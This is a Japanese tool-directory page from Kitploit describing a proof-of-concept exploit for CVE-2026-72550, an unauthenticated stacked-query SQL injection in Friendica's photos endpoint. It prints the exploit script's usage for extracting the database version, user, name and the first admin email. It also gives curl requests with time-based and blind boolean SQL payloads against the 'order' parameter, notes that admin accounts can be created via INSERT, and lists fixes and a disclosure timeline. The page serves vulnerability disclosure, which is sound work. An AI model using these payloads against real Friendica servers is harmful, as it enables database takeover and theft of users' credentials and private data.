Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-72550-poc — CVE-2026-72550 — Friendica 認証不要のスタックドクエリSQLインジェクション PoC (CVSS 9.8 緊急) | Kitploit
ツール/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテスト
GitHubabdugafforov-bobur/cve-2026-72550-poc

CVE-2026-72550-poc

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-72550 — Friendica 認証不要のスタックドクエリSQLインジェクション PoC (CVSS 9.8 緊急)

リポジトリを見る
7日前未レビュー

CVE-2026-72550 — Friendica の未認証SQLインジェクション

Friendica の photos エンドポイントにおける未認証のスタックドクエリSQLインジェクションにより、任意の訪問者が任意の SQL を実行できます。

フィールド値
CVE IDCVE-2026-72550
製品Friendica(自己ホスト型フェデレーテッドソーシャルネットワーク)
影響を受けるバージョン<= 2026.08-dev (git HEAD e3fc1bc)
タイプCWE-89: SQLインジェクション(未認証、スタックドクエリ)
深刻度重大 — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
必要な認証なし

概要

Friendica の写真表示エンドポイントは、order クエリパラメータをエスケープせずに SHOW COLUMNS ... LIKE '...' 文へ連結し、これを素の PDO::query() で実行します。これにより複数のステートメントの実行が可能になります。ログインは不要で、標準インストール(block_public はデフォルトでオフ)では、公開されている任意の写真だけで十分です。PDO::query() はスタックドステートメントを実行するため、匿名の攻撃者はデータを読むだけでなく、INSERT/UPDATE による管理者ユーザーの作成を含む任意の SQL を実行できます。

脆弱なコードパス

root@kitploit:~
mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

デフォルトのリクエストパスはこのコードに到達します。$cmd はデフォルトで 'view' となり($cmd === 'view' ゲートを満たす)、no_count はオフのため、認証も非デフォルト設定も必要ありません。

使用方法

root@kitploit:~
# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

パラメータ

手動での再現

Cookieや認証は不要です。公開されている任意の写真のリソースIDを指定してください:

root@kitploit:~
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

デコードされたペイロード: x';SELECT SLEEP(5)-- -

注入されたSQLは次のようになります:

root@kitploit:~
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

プラインドブール抽出

root@kitploit:~
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

影響

未認証の攻撃者は以下が可能です:

  • 読み取り データベース上の任意のデータ(資格情報、メール、プライベートメッセージのプラインド抽出)
  • 書き込み 任意の行の挿入 — INSERT INTO user による管理者アカウントの作成を含む
  • 変更 既存データの変更 — 任意のユーザーを管理者に昇格、投稿の改ざん、パスワードのリセット
  • 削除 データの削除やテーブルのドロップ(サービス拒否)

これは、デフォルトのFriendicaインストールにおいて、匿名の訪問者であれば誰でも到達可能な、データベース全体の完全な侵害です。

修正方法

  1. 使用前に order を既知のカラムホワイトリストに対して検証する
  2. SHOW COLUMNS で文字列連結の代わりにパラメータ化クエリを使用する
  3. PDO接続でのマルチステートメント実行を無効にする(PDO::ATTR_EMULATE_PREPARES => false)

タイムライン

日付イベント
2026-07-07ローカルインスタンスで脆弱性を発見・確認
2026-08-11TuranSec CNA 経由で CVE-2026-72550 公開

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみで提供されます。自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。作者は誤用に対するいかなる責任も負いません。

クレジット

発見者: Bobur Abdugafforov (@abdugafforov-bobur)

CVE は TuranSec CNA によって割り当てられました。

ツールをダウンロード
フラグ説明
-u / --urlターゲットのベースURL(例: http://target:8176)
-r / --userフォトギャラリーを対象とするユーザー名
-i / --resource-id公開されている任意の写真のリソースID
--extract抽出する値: version、db_user、db_name、admin_email
--check-only脆弱性のテストのみ行い、データは抽出しない
--sleepSLEEPディレイ(秒)(デフォルト: 5)